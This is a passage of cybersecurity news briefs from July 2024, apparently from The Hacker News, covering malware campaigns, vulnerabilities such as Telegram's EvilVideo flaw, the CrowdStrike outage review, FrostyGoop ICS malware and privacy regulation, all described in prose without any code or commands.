The flaws have been addressed in BIND 9 versions 9.18.28, 9.20.0, and 9.18.28-S1 released earlier this month. There is no evidence that any of the shortcomings have been exploited in the wild.
The disclosure comes months after the ISC addressed another flaw in BIND 9 called KeyTrap (CVE-2023-50387, CVSS score: 7.5) that could be abused to exhaust CPU resources and stall DNS resolvers, resulting in a denial-of-service (DoS).
New Chrome Feature Scans Password-Protected
Files for Malicious Content
26.7.24
Virus The Hacker News
Google said it's adding new security warnings when downloading potentially
suspicious and malicious files via its Chrome web browser.
"We have replaced our previous warning messages with more detailed ones that convey more nuance about the nature of the danger and can help users make more informed decisions," Jasika Bawa, Lily Chen, and Daniel Rubery from the Chrome Security team said.
To that end, the search giant is introducing a two-tier download warning taxonomy based on verdicts provided by Google Safe Browsing: Suspicious files and Dangerous files.
Each category comes with its own iconography, color, and text to distinguish them from one another and help users make an informed choice.
Google is also adding what's called automatic deep scans for users who have opted-in to the Enhanced Protection mode of Safe Browsing in Chrome so that they don't have to be prompted each time to send the files to Safe Browsing for deep scanning before opening them.
In cases where such files are embedded within password-protected archives, users now have the option to "enter the file's password and send it along with the file to Safe Browsing so that the file can be opened and a deep scan may be performed."
Google emphasized that the files and their associated passwords are deleted a short time after the scan and that the collected data is only used for improving download protections.
"In Standard Protection mode, downloading a suspicious encrypted archive will also trigger a prompt to enter the file's password, but in this case, both the file and the password stay on the local device and only the metadata of the archive contents are checked with Safe Browsing," it said.
Telegram App Flaw Exploited to Spread Malware Hidden in Videos
25.7.24
Social The Hacker News
A zero-day security flaw in Telegram's mobile app for Android called EvilVideo
made it possible for attackers to malicious files disguised as harmless-looking
videos.
The exploit appeared for sale for an unknown price in an underground forum on June 6, 2024, ESET said. Following responsible disclosure on June 26, the issue was addressed by Telegram in version 10.14.5 released on July 11.
"Attackers could share malicious Android payloads via Telegram channels, groups, and chat, and make them appear as multimedia files," security researcher Lukáš Štefanko said in a report.
It's believed that the payload is concocted using Telegram's application programming interface (API), which allows for programmatic uploads of multimedia files to chats and channels. In doing so, it enables an attacker to camouflage a malicious APK file as a 30-second video.
Users who click on the video are displayed an actual warning message stating the video cannot be played and urges them to try playing it using an external player. Should they proceed with the step, they are subsequently asked to allow installation of the APK file through Telegram. The app in question is named "xHamster Premium Mod."
"By default, media files received via Telegram are set to download automatically," Štefanko said. "This means that users with the option enabled will automatically download the malicious payload once they open the conversation where it was shared."
While this option can be disabled manually, the payload can still be downloaded by tapping the download button accompanying the supposed video. It's worth noting that the attack does not work on Telegram clients for the web or the dedicated Windows app.
It's currently not clear who is behind the exploit and how widely it was used in real-world attacks. The same actor, however, advertised in January 2024 a fully undetectable Android crypter (aka cryptor) that can reportedly bypass Google Play Protect.
Hamster Kombat's Viral Success Spawns Malicious Copycat#
The development comes as cyber criminals are capitalizing on the Telegram-based
cryptocurrency game Hamster Kombat for monetary gain, with ESET discovering fake
app stores promoting the app, GitHub repositories hosting Lumma Stealer for
Windows under the guise of automation tools for the game, and an unofficial
Telegram channel that's used to distribute an Android trojan called Ratel.
The popular game, which launched in March 2024, is estimated to have more than 250 million players, according to the game developer. Telegram CEO Pavel Durov has called Hamster Kombat the "fastest-growing digital service in the world" and that "Hamster's team will mint its token on TON, introducing the benefits of blockchain to hundreds of millions of people."
Ratel, offered via a Telegram channel named "hamster_easy," is designed to
impersonate the game ("Hamster.apk") and prompts users to grant it notification
access and set itself as the default SMS application. It subsequently initiates
contact with a remote server to get a phone number as response.
In the next step, the malware sends a Russian language SMS message to that phone number, likely belonging to the malware operators, to receive additional instructions over SMS.
"The threat actors then become capable of controlling the compromised device via SMS: The operator message can contain a text to be sent to a specified number, or even instruct the device to call the number," ESET said. "The malware is also able to check the victim's current banking account balance for Sberbank Russia by sending a message with the text баланс (translation: balance) to the number 900."
Ratel abuses its notification access permissions to hide notifications from no less than 200 apps based on a hard-coded list embedded within it. It's suspected that this is being done in an attempt to subscribe the victims to various premium services and prevent them from being alerted.
The Slovakian cybersecurity firm said it also spotted fake application storefronts claiming to offer Hamster Kombat for download, but actually directs users to unwanted ads, and GitHub repositories offering Hamster Kombat automation tools that deploy Lumma Stealer instead.
"The success of Hamster Kombat has also brought out cybercriminals, who have already started to deploy malware targeting the players of the game," Štefanko and Peter Strýček said. "Hamster Kombat's popularity makes it ripe for abuse, which means that it is highly likely that the game will attract more malicious actors in the future."
BadPack Android Malware Slips Through the Cracks#
Beyond Telegram, malicious APK files targeting Android devices have also taken
the form of BadPack, which refer to specially crafted package files in which the
header information used in the ZIP archive format has been altered in an attempt
to obstruct static analysis.
In doing so, the idea is to prevent the AndroidManifest.xml file – a crucial file that provides essential information about the mobile application – from being extracted and properly parsed, thereby allowing malicious artifacts to be installed without raising any red flags.
This technique was extensively documented by Kaspersky earlier this April in connection with an Android trojan referred to as SoumniBot that has targeted users in South Korea. Telemetry data gathered by Palo Alto Networks Unit 42 from June 2023 through June 2024 has detected nearly 9,200 BadPack samples in the wild, although none of them have been found on Google Play Store.
"These tampered headers are a key feature of BadPack, and such samples typically pose a challenge for Android reverse engineering tools," Unit 42 researcher Lee Wei Yeong said in a report published last week. "Many Android-based banking Trojans like BianLian, Cerberus and TeaBot use BadPack."
Update#
In a statement shared with The Hacker News, Telegram said the exploit is not a
vulnerability in the platform and it deployed a server-side fix on July 9, 2024,
to secure users.
"It would have required users to open the video, adjust Android safety settings and then manually install a suspicious-looking 'media app,'" the company said, emphasizing that the exploit only poses a security risk when users install the app after bypassing the security feature.
Google said Android users are automatically secured against trojans via Google Play Protect, which is enabled by default on all devices with Google Play Services. "Google Play Protect can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play," it said.
Patchwork Hackers Target Bhutan with
Advanced Brute Ratel C4 Tool
25.7.24
Hacking The Hacker News
The threat actor known as Patchwork has been linked to a cyber attack targeting
entities with ties to Bhutan to deliver the Brute Ratel C4 framework and an
updated version of a backdoor called PGoShell.
The development marks the first time the adversary has been observed using the red teaming software, the Knownsec 404 Team said in an analysis published last week.
The activity cluster, also called APT-C-09, Dropping Elephant, Operation Hangover, Viceroy Tiger, and Zinc Emerson, is a state-sponsored actor likely of Indian origin.
Known for conducting spear-phishing and watering hole attacks against China and Pakistan, the hacking crew is believed to be active since at least 2009, according to data shared by Chinese cybersecurity firm QiAnXin.
Last July, Knownsec 404 disclosed details of an espionage campaign aimed at universities and research organizations in China that leveraged a .NET-based implant codenamed EyeShell to fetch and execute commands from an attacker-controlled server, run additional payloads, and capture screenshots.
Then earlier this February, it was found that the threat actor had employed romance-themed lures to ensnare victims in Pakistan and India and compromise their Android devices with a remote access trojan dubbed VajraSpy.
The starting point of the latest observed attack chain is a Windows shortcut (LNK) file that's designed to download a decoy PDF document from a remote domain impersonating the UNFCCC-backed Adaptation Fund, while stealthily deploying Brute Ratel C4 and PGoShell retrieved from a different domain ("beijingtv[.]org").
"PGoShell is developed in the Go programming language; overall, it offers a rich set of functionalities, including remote shell capabilities, screen capture, and downloading and executing payloads," the cybersecurity company said.
The development comes months after APT-K-47 – another threat actor sharing tactical overlaps with SideWinder, Patchwork, Confucius, and Bitter – was attributed to attacks involving the use of ORPCBackdoor as well as previously undocumented malware like WalkerShell, DemoTrySpy, and NixBackdoor to harvest data and execute shellcode.
The attacks are also notable for deploying an open-source command-and-control (C2) framework known as Nimbo-C2, which "enables a wide range of remote control functionalities," Knownsec 404 said.
CrowdStrike Explains Friday Incident
Crashing Millions of Windows Devices
25.7.24
Security The Hacker News
Cybersecurity firm CrowdStrike on Wednesday blamed an issue in its validation
system for causing millions of Windows devices to crash as part of a widespread
outage late last week.
"On Friday, July 19, 2024 at 04:09 UTC, as part of regular operations, CrowdStrike released a content configuration update for the Windows sensor to gather telemetry on possible novel threat techniques," the company said in its Preliminary Post Incident Review (PIR).
"These updates are a regular part of the dynamic protection mechanisms of the Falcon platform. The problematic Rapid Response Content configuration update resulted in a Windows system crash."
The incident impacted Windows hosts running sensor version 7.11 and above that was online between July 19, 2024, 04:09 UTC and 05:27 UTC and received the update. Apple macOS and Linux systems were not affected.
CrowdStrike said it delivers security content configuration updates in two ways, one via Sensor Content that's shipped with Falcon Sensor and another through Rapid Response Content that allows it to flag novel threats using various behavioral pattern-matching techniques.
The crash is said to have been the result of a Rapid Response Content update containing a previously undetected error. It's worth noting that such updates are delivered in the form of Template Instances corresponding to specific behaviors – each of which is mapped to a unique Template Type – for enabling new telemetry and detection.
The Template Instances, in turn, are created using a Content Configuration System, after which they are deployed to the sensor over the cloud through a mechanism dubbed Channel Files, which are ultimately written to disk on the Windows machine. The system also encompasses a Content Validator component that carries out validation checks on the content before it is published.
"Rapid Response Content provides visibility and detections on the sensor without requiring sensor code changes," it explained.
"This capability is used by threat detection engineers to gather telemetry, identify indicators of adversary behavior and perform detections and preventions. Rapid Response Content is behavioral heuristics, separate and distinct from CrowdStrike's on-sensor AI prevention and detection capabilities."
These updates are then parsed by the Falcon sensor's Content Interpreter, which then allows the Sensor Detection Engine to detect or prevent malicious activity, depending on the customer's policy configuration.
While each new Template Type is stress tested for different parameters like resource utilization and performance impact, the root cause of the problem, per CrowdStrike, could be traced back to the rollout of the Interprocess Communication (IPC) Template Type on February 28, 2024, that was introduced to flag attacks that abuse named pipes.
The timeline of events is as follows -
February 28, 2024 - CrowdStrike releases sensor 7.11 to customers with new IPC
Template Type
March 5, 2024 - The IPC Template Type passes the stress test and is validated
for use
March 5, 2024 - The IPC Template Instance is released to production via Channel
File 291
April 8 - 24, 2024 - Three more IPC Template Instances are deployed in
production
July 19, 2024 - Two additional IPC Template Instances are deployed, one of which
passes validation despite having problematic content data
"Based on the testing performed before the initial deployment of the Template
Type (on March 05, 2024), trust in the checks performed in the Content Validator,
and previous successful IPC Template Instance deployments, these instances were
deployed into production," CrowdStrike said.
"When received by the sensor and loaded into the Content Interpreter, problematic content in Channel File 291 resulted in an out-of-bounds memory read triggering an exception. This unexpected exception could not be gracefully handled, resulting in a Windows operating system crash (BSoD)."
In response to the sweeping disruptions caused by the crash and preventing them from happening again, the Texas-based company said it has improved its testing processes and enhanced its error handling mechanism in the Content Interpreter. It's also planning to implement a staggered deployment strategy for Rapid Response Content.
Microsoft Defender Flaw Exploited to Deliver ACR, Lumma, and Meduza Stealers
25.7.24
Exploit The Hacker News
A now-patched security flaw in the Microsoft Defender SmartScreen has been
exploited as part of a new campaign designed to deliver information stealers
such as ACR Stealer, Lumma, and Meduza.
Fortinet FortiGuard Labs said it detected the stealer campaign targeting Spain, Thailand, and the U.S. using booby-trapped files that exploit CVE-2024-21412 (CVSS score: 8.1).
The high-severity vulnerability allows an attacker to sidestep SmartScreen protection and drop malicious payloads. Microsoft addressed this issue as part of its monthly security updates released in February 2024.
"Initially, attackers lure victims into clicking a crafted link to a URL file designed to download an LNK file," security researcher Cara Lin said. "The LNK file then downloads an executable file containing an [HTML Application] script."
The HTA file serves as a conduit to decode and decrypt PowerShell code responsible for fetching a decoy PDF file and a shellcode injector that, in turn, either leads to the deployment of Meduza Stealer or Hijack Loader, which subsequently launches ACR Stealer or Lumma.
ACR Stealer, assessed to be an evolved version of the GrMsk Stealer, was advertised in late March 2024 by a threat actor named SheldIO on the Russian-language underground forum RAMP.
"This ACR stealer hides its [command-and-control] with a dead drop resolver (DDR) technique on the Steam community website," Lin said, calling out its ability to siphon information from web browsers, crypto wallets, messaging apps, FTP clients, email clients, VPN services, and password managers.
It's worth noting that recent Lumma Stealer attacks have also been observed
utilizing the same technique, making it easier for the adversaries to change the
C2 domains at any time and render the infrastructure more resilient, according
to the AhnLab Security Intelligence Center (ASEC).
The disclosure comes as CrowdStrike has revealed that threat actors are leveraging last week's outage to distribute a previously undocumented information stealer called Daolpu, making it the latest example of the ongoing fallout stemming from the faulty update that has crippled millions of Windows devices.
The attack involves the use of a macro-laced Microsoft Word document that masquerades as a Microsoft recovery manual listing legitimate instructions issued by the Windows maker to resolve the issue, leveraging it as a decoy to activate the infection process.
The DOCM file, when opened, runs the macro to retrieve a second-stage DLL file from a remote that's decoded to launch Daolpu, a stealer malware equipped to harvest credentials and cookies from Google Chrome, Microsoft Edge, Mozilla Firefox, and other Chromium-based browsers.
It also follows the emergence of new stealer malware families such as Braodo and DeerStealer, even as cyber criminals are exploiting malvertising techniques promoting legitimate software such as Microsoft Teams to deploy Atomic Stealer.
"As cyber criminals ramp up their distribution campaigns, it becomes more dangerous to download applications via search engines," Malwarebytes researcher Jérôme Segura said. "Users have to navigate between malvertising (sponsored results) and SEO poisoning (compromised websites)."
CISA Adds Twilio Authy and IE Flaws
to Exploited Vulnerabilities List
25.7.24
BigBrothers The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two
security flaws to its Known Exploited Vulnerabilities (KEV) catalog, based on
evidence of active exploitation.
The vulnerabilities are listed below -
CVE-2012-4792 (CVSS score: 9.3) - Microsoft Internet
Explorer Use-After-Free Vulnerability
CVE-2024-39891 (CVSS score: 5.3) - Twilio Authy Information Disclosure
Vulnerability
CVE-2012-4792 is a decade-old use-after-free vulnerability in Internet Explorer
that could allow a remote attacker to execute arbitrary code via a specially
crafted site.
It's currently not clear if the flaw has been subjected to renewed exploitation attempts, although it was abused as part of watering hole attacks targeting the Council on Foreign Relations (CFR) and Capstone Turbine Corporation websites back in December 2012.
On the other hand, CVE-2024-39891 refers to an information disclosure bug in an unauthenticated endpoint that could be exploited to "accept a request containing a phone number and respond with information about whether the phone number was registered with Authy."
Earlier this month, Twilio said it resolved the issue in versions 25.1.0 (Android) and 26.1.0 (iOS) after unidentified threat actors took advantage of the shortcoming to identify data associated with Authy accounts.
"These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise," CISA said in an advisory.
Federal Civilian Executive Branch (FCEB) agencies are required to remediate the identified vulnerabilities by August 13, 2024, to protect their networks against active threats.
Chinese Hackers Target Taiwan and US
NGO with MgBot Malware
24.7.24
Virus The Hacker News
Organizations in Taiwan and a U.S. non-governmental organization (NGO) based in
China have been targeted by a Beijing-affiliated state-sponsored hacking group
called Daggerfly using an upgraded set of malware tools.
The campaign is a sign that the group "also engages in internal espionage," Symantec's Threat Hunter Team, part of Broadcom, said in a new report published today. "In the attack on this organization, the attackers exploited a vulnerability in an Apache HTTP server to deliver their MgBot malware."
Daggerfly, also known by the names Bronze Highland and Evasive Panda, was previously observed using the MgBot modular malware framework in connection with an intelligence-gathering mission aimed at telecom service providers in Africa. It's known to be operational since 2012.
"Daggerfly appears to be capable of responding to exposure by quickly updating its toolset to continue its espionage activities with minimal disruption," the company noted.
The latest set of attacks are characterized by the use of a new malware family based on MgBot as well as an improved version of a known Apple macOS malware called MACMA, which was first exposed by Google's Threat Analysis Group (TAG) in November 2021 as distributed via watering hole attacks targeting internet users in Hong Kong by abusing security flaws in the Safari browser.
The development marks the first time the malware strain, which is capable of harvesting sensitive information and executing arbitrary commands, has been explicitly linked to a particular hacking group.
"The actors behind macOS.MACMA at least were reusing code from ELF/Android developers and possibly could have also been targeting Android phones with malware as well," SentinelOne noted in a subsequent analysis at the time.
MACMA's connections to Daggerly also stem from source code overlaps between the malware and Mgbot, and the fact that it connects to a command-and-control (C2) server (103.243.212[.]98) that has also been used by a MgBot dropper.
Another new malware in its arsenal is Nightdoor (aka NetMM and Suzafk), an implant that uses Google Drive API for C2 and has been utilized in watering hole attacks aimed at Tibetan users since at least September 2023. Details of the activity were first documented by ESET earlier this March.
"The group can create versions of its tools targeting most major operating system platform," Symantec said, adding it has "seen evidence of the ability to trojanize Android APKs, SMS interception tools, DNS request interception tools, and even malware families targeting Solaris OS."
The development comes as China's National Computer Virus Emergency Response Center (CVERC) claimed Volt Typhoon – which has been attributed by the Five Eyes nations as a China-nexus espionage group – to be an invention of the U.S. intelligence agencies, describing it as a misinformation campaign.
"Although its main targets are U.S. congress and American people, it also attempt[s] to defame China, sow discords [sic] between China and other countries, contain China's development, and rob Chinese companies," the CVERC asserted in a recent report.
New ICS Malware 'FrostyGoop'
Targeting Critical Infrastructure
24.7.24
ICS The Hacker News
Cybersecurity researchers have discovered what they say is the ninth Industrial
Control Systems (ICS)-focused malware that has been used in a disruptive cyber
attack targeting an energy company in the Ukrainian city of Lviv earlier this
January.
Industrial cybersecurity firm Dragos has dubbed the malware FrostyGoop, describing it as the first malware strain to directly use Modbus TCP communications to sabotage operational technology (OT) networks. It was discovered by the company in April 2024.
"FrostyGoop is an ICS-specific malware written in Golang that can interact directly with Industrial Control Systems (ICS) using Modbus TCP over port 502," researchers Kyle O'Meara, Magpie (Mark) Graham, and Carolyn Ahlers said in a technical report shared with The Hacker News.
It's believed that the malware, mainly designed to target Windows systems, has been used to target ENCO controllers with TCP port 502 exposed to the internet. It has not been tied to any previously identified threat actor or activity cluster.
FrostyGoop comes with capabilities to read and write to an ICS device holding registers containing inputs, outputs, and configuration data. It also accepts optional command line execution arguments, uses JSON-formatted configuration files to specify target IP addresses and Modbus commands, and logs output to a console and/or a JSON file.
The incident targeting the municipal district energy company is said to have resulted in a loss of heating services to more than 600 apartment buildings for almost 48 hours.
"The adversaries sent Modbus commands to ENCO controllers, causing inaccurate measurements and system malfunctions," the researchers said in a conference call, noting initial access was likely gained by exploiting a vulnerability in Mikrotik routers in April 2023.
"The adversaries sent Modbus commands to ENCO controllers, causing inaccurate measurements and system malfunctions. Remediation took almost two days."
While FrostyGoop extensively employs the Modbus protocol for client/server communications, it's far from the only one. In 2022, Dragos and Mandiant detailed another ICS malware named PIPEDREAM (aka INCONTROLLER) that leveraged various industrial network protocols such as OPC UA, Modbus, and CODESYS for interaction.
It's also the ninth ICS-focused malware after Stuxnet, Havex, Industroyer (aka CrashOverride), Triton (aka Trisis), BlackEnergy2, Industroyer2, and COSMICENERGY.
The malware's ability to read or modify data on ICS devices using Modbus has severe consequences for industrial operations and public safety, Dragos said, adding more than 46,000 internet-exposed ICS appliances communicate over the widely-used protocol.
"The specific targeting of ICS using Modbus TCP over port 502 and the potential to interact directly with various ICS devices pose a serious threat to critical infrastructure across multiple sectors," the researchers said.
"Organizations must prioritize the implementation of comprehensive cybersecurity frameworks to safeguard critical infrastructure from similar threats in the future."
Magento Sites Targeted with Sneaky
Credit Card Skimmer via Swap Files
24.7.24
Crime The Hacker News
Threat actors have been observed using swap files in compromised websites to
conceal a persistent credit card skimmer and harvest payment information.
The sneaky technique, observed by Sucuri on a Magento e-commerce site's checkout page, allowed the malware to survive multiple cleanup attempts, the company said.
The skimmer is designed to capture all the data into the credit card form on the website and exfiltrate the details to an attacker-controlled domain named "amazon-analytic[.]com," which was registered in February 2024.
"Note the use of the brand name; this tactic of leveraging popular products and services in domain names is often used by bad actors in an attempt to evade detection," security researcher Matt Morrow said.
This is just one of many defense evasion methods employed by the threat actor, which also includes the use of swap files ("bootstrap.php-swapme") to load the malicious code while keeping the original file ("bootstrap.php") intact and free of malware.
"When files are edited directly via SSH the server will create a temporary 'swap' version in case the editor crashes, which prevents the entire contents from being lost," Morrow explained.
"It became evident that the attackers were leveraging a swap file to keep the malware present on the server and evade normal methods of detection."
Although it's currently not clear how the initial access was obtained in this case, it's suspected to have involved the use of SSH or some other terminal session.
The disclosure arrives as compromised administrator user accounts on WordPress sites are being used to install a malicious plugin that masquerades as the legitimate Wordfence plugin, but comes with capabilities to create rogue admin users and disable Wordfence while giving a false impression that everything is working as expected.
"In order for the malicious plugin to have been placed on the website in the first place, the website would have already had to have been compromised — but this malware could definitely serve as a reinfection vector," security researcher Ben Martin said.
"The malicious code only works on pages of WordPress admin interface whose URL contains the word 'Wordfence' in them (Wordfence plugin configuration pages)."
Site owners are advised to restrict the use of common protocols like FTP, sFTP, and SSH to trusted IP addresses, as well as ensure that the content management systems and plugins are up-to-date.
Users are also recommended to enable two-factor authentication (2FA), use a firewall to block bots, and enforce additional wp-config.php security implementations such as DISALLOW_FILE_EDIT and DISALLOW_FILE_MODS.
Meta Given Deadline to Address E.U. Concerns Over 'Pay or Consent' Model
24.7.24
Social The Hacker News
Meta has been given time till September 1, 2024, to respond to concerns raised
by the European Commission over its "pay or consent" advertising model or risk-facing
enforcement measures, including sanctions.
The European Commission said the Consumer Protection Cooperation (CPC) Network has notified the social media giant that the model adopted for Facebook and Instagram might potentially violate consumer protection laws.
It described the new practice as misleading and confusing, with authorities expressing worries that consumers might have been pressured into choosing quickly between either paying for a monthly subscription or consenting to their personal data being used for targeted advertising.
This, the agency said, could have been motivated by fears that they "would instantly lose access to their accounts and their network of contacts."
Meta, which introduced a subscription plan for European Union (E.U.) users in late 2023, has run into hot water over offering what's essentially not a choice at all and for extracting a "privacy fee" to exercise their data protection rights.
As per the E.U. Digital Markets Act (DMA), companies in gatekeeper roles are required to seek users' express consent before utilizing their data for offering services that go beyond their core functionality (e.g., advertising) or provide access to a less personalized but equivalent version of the platforms for those who refuse to opt in.
"Gatekeepers cannot make use of the service or certain functionalities conditional on users' consent," the Commission noted earlier this month, stating that Meta's model is in violation of the DMA.
The Commission further called out Meta for using vague terms and branding the service as "free" when, in reality, it forces consumers to agree to their data used for personalized ads, not to mention making the experience confusing by making them "navigate through different screens" to determine how their data is used and processed for advertising purposes.
Meta, however, considers the paid version a legitimate business model, and has pointed to a ruling from the Court of Justice of the European Union (CJEU) last July that a company may offer an equivalent alternative version of its service "for an appropriate fee" that does not rely on data collection for ads.
That said, it bears noting here that the judgment pertains to in the context of users signing up for Meta's services, and not to existing users (which is where the aforementioned issues associated with changes to the consent model come from). It remains to be seen if it can be interpreted as a legal precedent.
"Consumers must not be lured into believing that they would either pay and not be shown any ads anymore, or receive a service for free, when, instead, they would agree that the company used their personal data to make revenue with ads," Didier Reynders, E.U. Commissioner for Justice, said.
"Traders must inform consumers upfront and in a fully transparent manner on how they use their personal data. This is a fundamental right that we will protect."
The development comes days after Nigeria's Federal Competition and Consumer Protection Commission (FCCPC) fined Meta $220 million after an investigation showed that the company's data sharing on Facebook and WhatsApp violated local consumer, data protection, and privacy laws by collecting users' information without their consent.
"Meta Parties shall immediately and forthwith stop the process of sharing WhatsApp user's information with other Facebook companies and third parties, until such a time when users have actively and voluntarily consented to each and every component of the liberties Meta parties intend to exercise with respect to the information of the data subjects," a final order issued last week read.
Earlier this May, the Turkish competition board imposed a $37.20 million penalty against the American tech giant over its data-sharing practices across Facebook, Instagram, Threads, and WhatsApp.
It also follows a report that Oracle has agreed to pay $115 million to settle a class-action lawsuit in the U.S. accusing the database software and cloud computing company of breaching users' privacy by collecting their personal information and selling it to third-parties.
Google, meanwhile, has become the subject of a new probe initiated by the Italian data protection authority over how it gets users' consent prior to combining personal data from different services and if it provides adequate information to influence that choice.
"Google may use techniques and methods for requesting consent, and also for setting up the mechanisms for obtaining consent itself, which could condition the freedom of choice of the average consumer," the Garante alleged.
"Indeed, the customer would be induced to take a commercial decision that he/she would not have taken otherwise, by consenting to the combination and cross-use of his/her personal data among the plurality of services offered."
Ukrainian Institutions Targeted
Using HATVIBE and CHERRYSPY Malware
24.7.24
BigBrothers The Hacker News
The Computer Emergency Response Team of Ukraine (CERT-UA) has alerted of a spear-phishing
campaign targeting a scientific research institution in the country with malware
known as HATVIBE and CHERRYSPY.
The agency attributed the attack to a threat actor it tracks under the name UAC-0063, which was previously observed targeting various government entities to gather sensitive information using keyloggers and backdoors.
The attack is characterized by the use of a compromised email account belonging to an employee of the organization to send phishing messages to "dozens" of recipients containing a macro-laced Microsoft Word (DOCX) attachment.
Opening the document and enabling macros results in the execution of an encoded HTML Application (HTA) named HATVIBE, which sets up persistence on the host using a scheduled task and paves the way for a Python backdoor codenamed CHERRYSPY, which is capable of running commands issued by a remote server.
CERT-UA said it detected "numerous cases" of HATVIBE infections that exploit a known security flaw in HTTP File Server (CVE-2024-23692, CVSS score: 9.8) for initial access.
UAC-0063 has been associated with a Russia-linked nation-state group dubbed APT28 with moderate confidence. APT28, which is also referred to as BlueDelta, Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422, is affiliated with Russia's strategic military intelligence unit, the GRU.
The development comes as CERT-UA detailed another phishing campaign targeting
Ukrainian defense enterprises with booby-trapped PDF files embedding a link that,
when clicked, downloads an executable (aka GLUEEGG), which is responsible for
decrypting and running a Lua-based loader called DROPCLUE.
DROPCLUE is designed to open a decoy document to the victim, while covertly downloading a legitimate Remote Desktop program called Atera Agent using the curl utility. The attack has been linked to a cluster tracked as UAC-0180.
Google Abandons Plan to Phase Out Third-Party Cookies in Chrome
23.7.24
Security The Hacker News
Google on Monday abandoned plans to phase out third-party tracking cookies in
its Chrome web browser more than four years after it introduced the option as
part of a larger set of a controversial proposal called the Privacy Sandbox.
"Instead of deprecating third-party cookies, we would introduce a new experience in Chrome that lets people make an informed choice that applies across their web browsing, and they'd be able to adjust that choice at any time," Anthony Chavez, vice president of the initiative, said.
"We're discussing this new path with regulators, and will engage with the industry as we roll this out."
The significant policy reversal comes nearly three months following the company's announcement that it intends to eliminate third-party cookies starting early next year after repeated delays, underscoring the project's tumultuous history.
While Apple Safari and Mozilla Firefox no longer support third-party cookies as of early 2020, Google has had a tougher time turning it off owing to its own prominent role as a web browser vendor and an advertising platform.
The company's idea of balancing online privacy vis-à-vis an ad-supported internet using Privacy Sandbox has courted scrutiny from regulators, advertisers, and privacy advocates, prompting it to redraw the contours of the cookie-replacement technology several times over the past few years.
Last month, Austrian privacy non-profit noyb (none of your business) said it merely shifts the control from a third-party to Google and that it can still be used to track users without giving them an option to consent in an informed and transparent manner.
Apple, which has introduced advanced tracking and fingerprinting protections in Safari, has been critical of Topics API, a crucial aspect of Privacy Sandbox that sorts users' interests into an ever-evolving list of predefined topics based on their browsing histories in order to serve personalized ads.
"The user doesn't get told upfront which topics Chrome has tagged them with or which topics it exposes to which parties," Apple's John Wilander said, noting how it can be used to fingerprint and re-identify users as well as profile their cross-site activity.
Specifically, it pointed out implementation loopholes that could potentially allow a data broker embedded in websites to capture a user's changing interests over time by periodically querying the Topics API and creating a permanent profile by combining it with other data points.
"Now imagine what advanced machine learning and artificial intelligence can deduce about you based on various combinations of interest signals," Wilander said. "What patterns will emerge when data brokers and trackers can compare and contrast across large portions of the population?"
"We think the web should not expose such information across websites and we don't think the browser, i.e. the user agent, should facilitate any such data collection or use."
Privacy Sandbox has also faced regulatory hurdles over concerns that the technology could give Google an unfair advantage in the digital advertising market and limit competition, complicating the rollout process further.
The development is an admission from Google that gaining industry-wide consensus around a single solution is more challenging than it sounds. A pivot from cookies "requires significant work by many participants and will have an impact on publishers, advertisers, and everyone involved in online advertising," it said.
The U.K. Competition and Markets Authority (CMA), which is closely overseeing the changes being made by the search giant, said it's evaluating the impact of the new announcement.
"Instead of removing third-party cookies from Chrome, it will be introducing a user-choice prompt, which will allow users to choose whether to retain third-party cookies," the CMA said. "The CMA will now work closely with the [Information Commissioner's Office] to carefully consider Google's new approach to Privacy Sandbox."
Experts Uncover Chinese Cybercrime Network Behind Gambling and Human
Trafficking
23.7.24
Hacking The Hacker News
The relationship between various TDSs and DNS associated with Vigorish Viper and
the final landing experience for the user
A Chinese organized crime syndicate with links to money laundering and human
trafficking across Southeast Asia has been using an advanced "technology suite"
that runs the whole cybercrime supply chain spectrum to spearhead its operations.
Infoblox is tracking the proprietor and maintainer under the moniker Vigorish Viper, noting that it's developed by the Yabo Group (aka Yabo Sports), which has been linked to illegal gambling operations and pig butchering scams in the past. In late 2022, it rebranded as Kaiyun Sports and has since been absorbed into another newly formed entity called Ponymuah.
The suite, marketed in China as "baowang" ("包网," meaning full package) encompasses several components such as Domain Name System (DNS) configurations, website hosting, payment mechanisms, advertising, and mobile apps. It also hosts thousands of domain names and numerous brands in an infrastructure that's tied to Hong Kong and China.
The enterprise hinges on securing European football club sponsorships using front companies or white label brands, and using them as a "force multiplier" to advertise illegal gambling sites in the region with the goal of attracting more bettors. In July 2023, it was reported that betting company logos appeared as often as 3,500 times during the course of a televised football match.
Yabo, Ponymuah, and other related offshoots like OB (aka OBGM), DB Gaming, Panda Sports, KM Gaming, and Smart King Games (SKG) are all part of Vigorish Viper's sprawling network, highlighting the tangled and murky ownership of the gambling companies and the painstaking steps undertaken to sidestep scrutiny.
It's not just English football clubs that have engaged in these sponsorships, as the investigation has unearthed that cricket and kabaddi teams in India have also entered into similar sponsorship agreements to advertise Vigorish Viper brands.
"Vigorish Viper operates a vast network of over 170,000 active domain names, evading detection and law enforcement through its sophisticated use of DNS CNAME traffic distribution systems," Infoblox researchers Maël Le Touz, Jacques Portal, Renée Burton, and Elena Puga in an exhaustive report shared with The Hacker News.
"In addition to gambling, Vigorish Viper's CNAME [traffic distribution systems] serve illegal streaming and pornography sites. Some of the domains used for streaming are long-registered domains that Vigorish Viper picked up after the original registration expired."
Burton, vice president of threat intelligence at Infoblox, described the threat actor as "one of the most sophisticated and important threats to digital security" discovered to date.
An overview of Vigorish Viper's sports sponsorship scheme
"Vigorish Viper created a complex infrastructure with multiple layers of traffic
distribution systems (TDSs) using DNS CNAME records and JavaScript, which makes
it incredibly difficult to detect," Burton said in a statement. "These systems
are complemented by their own encrypted communications and custom-developed
applications, making their activities not only elusive but also remarkably
resilient."
This entails the use of DNS CNAME records to redirect traffic from one domain through another, a technique previously adopted by other DNS threat actors like Savvy Seahorse. Furthermore, the system has the capability to differentiate between residential, mobile, and commercial IP addresses in China.
Earlier this January, the Danish Institute for Sports Studies' Play the Game initiative uncovered connections between dozens of European football clubs and illegal gambling brands that can be traced back to Yabo and target jurisdictions like China where gambling is prohibited and considered an organized crime.
The online crimes also have an offline aspect involving human trafficking wherein people are lured with the promise of high-paying jobs and are coerced into supporting sports betting schemes and promoting pig butchering scams and other cryptocurrency scams, according to the Asian Racing Federation (ARF).
